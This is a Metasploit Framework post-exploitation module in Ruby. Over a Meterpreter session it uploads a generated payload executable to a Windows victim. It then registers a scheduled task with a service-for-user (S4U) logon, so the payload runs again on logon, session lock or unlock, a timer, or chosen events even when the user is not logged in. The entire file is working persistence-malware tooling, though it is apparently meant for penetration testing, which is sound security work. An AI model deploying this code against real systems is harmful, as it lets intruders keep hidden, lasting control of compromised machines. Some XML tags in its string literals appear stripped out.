## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Exploit::EXE def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage User Level Persistent Payload Installer', 'Description' => %q{ Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight). }, 'License' => MSF_LICENSE, 'Author' => [ 'Thomas McCarthy "smilingraccoon" ', 'Brandon McCann "zeknox" ' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] ] )) register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), OptString.new('REXENAME',[false, 'Name of exe on remote system']), OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), OptString.new('PATH',[false, 'PATH to write payload']) ], self.class) register_advanced_options( [ OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']), OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']), OptString.new('XPATH', [false, 'XPath query']) ], self.class) end def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? print_status("The properties of any event in the event viewer will contain this information") fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end # Generate payload payload = generate_payload_exe # Generate remote executable name rexename = generate_rexename # Generate path names xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) # Fix XML based on trigger xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML create_task(xml_path, schname, rexe_path) end ############################################################## # Generate name for payload # Returns name def generate_rexename rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") end return rexename end ############################################################## # Generate Path for payload upload # Returns path for xml and payload def generate_path(rexename) # generate a path to write payload and xml path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path end ############################################################## # Upload the executable payload # Returns boolean for success def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin write_file(path, payload) rescue => e fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") end ############################################################## # Creates a scheduled task, exports as XML, deletes task # Returns normal XML for generic task def create_xml(rexe_path) xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_file = File.new(xml_path,"r") xml = xml_file.read xml_file.close # Get local time, not system time from victim machine begin vt = client.railgun.kernel32.GetLocalTime(32) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue print_warning("Could not read system time from victim...using your local time to determine creation date") t = ::Time.now end date = t.strftime("%Y-%m-%d") time = t.strftime("%H:%M:%S") # put in correct times xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") domain, user = client.sys.config.getuid.split('\\') # put in user information xml = xml.sub(/DOMAINHERE/, user) xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") xml = xml.sub(/COMMANDHERE/, rexe_path) return xml end ############################################################## # Takes the XML, alters it based on trigger specified. Will also # add in expiration tag if used. # Returns the modified XML def add_xml_triggers(xml) # Insert trigger case datastore['TRIGGER'] when 'logon' # Trigger based on winlogon event, checks windows license key after logon print_status("This trigger triggers on event 4101 which validates the Windows license") line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" xml = create_trigger_event_tags("Application", line, xml) when 'lock' xml = create_trigger_tags("SessionLock", xml) when 'unlock' xml = create_trigger_tags("SessionUnlock", xml) when 'event' line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" if not datastore['XPATH'].nil? and not datastore['XPATH'].empty? # Append xpath queries line << " and #{datastore['XPATH']}" # Print XPath query, useful to user to spot issues with uncommented single quotes print_status("XPath query: #{line}") end xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) when 'schedule' # Change interval tag, insert into XML if datastore['FREQUENCY'] != 0 minutes = datastore['FREQUENCY'] else print_status("Defaulting frequency to every hour") minutes = 60 end xml = xml.sub(/.*?PT#{minutes}M<") # Insert expire tag if not 0 unless datastore['EXPIRE_TIME'] == 0 # Generate expire tag end_boundary = create_expire_tag # Inject expire tag insert = xml.index("") xml.insert(insert + 16, "\n #{end_boundary}") end end return xml end ############################################################## # Creates end boundary tag which expires the trigger # Returns XML for expire def create_expire_tag() # Get local time, not system time from victim machine begin vt = client.railgun.kernel32.GetLocalTime(32) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue print_error("Could not read system time from victim...using your local time to determine expire date") t = ::Time.now end # Create time object to add expire time to and create tag t = t + (datastore['EXPIRE_TIME'] * 60) date = t.strftime("%Y-%m-%d") time = t.strftime("%H:%M:%S") end_boundary = "#{date}T#{time}" return end_boundary end ############################################################## # Creates trigger XML for session state triggers and replaces # the time trigger. # Returns altered XML def create_trigger_tags(trig, xml) domain, user = client.sys.config.getuid.split('\\') # Create session state trigger, weird spacing used to maintain # natural Winadows spacing for XML export temp_xml = "\n" temp_xml << " #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " true\n" temp_xml << " #{trig}\n" temp_xml << " #{domain}\\#{user}\n" temp_xml << " " xml = xml.gsub(/.*<\/TimeTrigger>/m, temp_xml) return xml end ############################################################## # Creates trigger XML for event based triggers and replaces # the time trigger. # Returns altered XML def create_trigger_event_tags(log, line, xml) # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # used to maintain natural Windows spacing for XML export temp_xml = "\n" temp_xml << " #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " true\n" temp_xml << " <QueryList><Query Id=\"0\" " temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" temp_xml << line temp_xml << "</Select></Query></QueryList>" temp_xml << "\n" temp_xml << " " xml = xml.gsub(/.*<\/TimeTrigger>/m, temp_xml) return xml end ############################################################## # Takes the XML and a path and writes file to filesystem # Returns boolean for success def write_xml(xml, path, rexe_path) if file? path delete_file(rexe_path) fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin write_file(path, xml) rescue delete_file(rexe_path) fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") end ############################################################## # Takes path and delete file # Returns boolean for success def delete_file(path) begin file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") end end ############################################################## # Takes path and name for task and creates final task # Returns boolean for success def create_task(path, schname, rexe_path) # create task using XML file on victim fs create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") if create_task_response =~ /has successfully been created/ print_good("Persistence task #{schname} created successfully") # Create to delete commands for exe and task del_task = "schtasks /delete /tn \"#{schname}\" /f" print_status("#{"To delete task:".ljust(20)} #{del_task}") print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}") del_task << "\ndel #{rexe_path}" # Delete XML from victim delete_file(path) # Save info to notes DB report_note(:host => session.session_host, :type => "host.s4u_persistance.cleanup", :data => { :session_num => session.sid, :stype => session.type, :desc => session.info, :platform => session.platform, :via_payload => session.via_payload, :via_exploit => session.via_exploit, :created_at => Time.now.utc, :delete_commands => del_task } ) elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ # Clean up delete_file(rexe_path) delete_file(path) error = "The scheduled task name is already in use" fail_with(Exploit::Failure::Unknown, error) else error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") end # Clean up delete_file(rexe_path) delete_file(path) fail_with(Exploit::Failure::Unknown, error) end end end